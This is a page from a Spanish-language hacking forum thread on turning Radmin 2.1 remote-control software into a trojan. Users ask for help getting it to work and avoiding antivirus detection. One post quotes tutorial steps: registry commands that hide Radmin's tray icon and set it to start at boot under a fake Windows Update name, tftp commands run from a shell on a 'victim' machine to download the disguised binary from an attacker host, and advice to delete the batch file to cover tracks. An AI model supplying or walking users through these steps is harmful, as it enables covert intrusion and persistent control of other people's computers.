elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 18:38  


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado (Moderadores: ANELKAOS, TRICKY)
| | |-+  Troyanizando Radmin 2.1 control remoto
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 2 3 4 5 6 7 [8] Ir Abajo Respuesta Imprimir
Autor Tema: Troyanizando Radmin 2.1 control remoto  (Leído 108,123 veces)
rafael_21

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #105 en: 28 Noviembre 2008, 20:08 »

disculpen no entiendo el comando tftp por favor si alguien me lo puede explicar se los Agradecería, he tratado de subir los archivos al pc remoto pero me manda tiempo de espera agotado.
En línea
flow1flow

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #106 en: 13 Noviembre 2011, 17:00 »

ola a todo el mundo ...perdonar por la pregunta pero .... eo estoy siguendo todo los pasos para troyanizar el radmin 2.1  y resulta que  al final me lo esta creando pero ... PERO    resulta que esta detectado como virus  asta mi antivirus que es avast ... y lo tengo desactualizado  me lo detecta como virus .... perdonar a todos pero llevo 3 dias y 3 noches para crealo y todo me sale siemmpre igual.... aver si ustedes me podeis sacar de la duda por favor     e echo el .bat  e cambiado todo igual que en el tutorial .... ... porva  necesito ayudsa
En línea
chicocos

Desconectado Desconectado

Mensajes: 14


Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #107 en: 7 Diciembre 2011, 23:14 »

Después de bastantes años, decidí hacerlo haber que tal ya que soy un completo n00b en esto... así que si pregunto cosas coherentes... LO SIENTO

Y mi duda es la siguiente:

Todo lo que copio a continuación entra dentro del .bat?

Citar
6.-Bien ahora vamos a hacer un bat que nos agrege las llaves en el registro y que arranque a radmin con el inicio del sistema.

codigo:

Citar
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d "b7060000"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "3Ab503515d51eb10c3f98c7ab7bc5993"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000"
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuauclt /t REG_SZ /d "C:\windows\system32\wuaudt.exe"

solo sustituyan los valores por los suyos.

7.-Subir archivos via tftp

una ves que tengamos una shell remota de la victima vamos a subirle a radmin, para eso siguiendo el ejemplo que estoy poniendo seria:

Citar
tftp -i xxx.xxx.xxx.xxx get wuaudt.exe C:\windows\system32\wuaudt.exe
este es el radmin ya debidamente camuflageado

Citar
tftp -i xxx.xxx.xxx.xxx get AdmDll.dll C:\windows\system32\AdmDll.dll
la dll del radmin, no le cambien el nombre

Citar
tftp -i xxx.xxx.xxx.xxx get 1025.bat C:\windows\system32\1025.bat
este es el bat que se encarga de agregar los valores en el registro, pueden agregarle un del al final del bat para no dejar rastros (ejem: del 1025.bat)


Por otro lado, cuando pone tftp -i xxx.xxx.xxx.xxx que se supone que debo poner en dichas xxx? Ojalá pudieran ayudarme después de tantos años... muchisimas gracias de antemano!! :)
En línea
Páginas: 1 2 3 4 5 6 7 [8] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines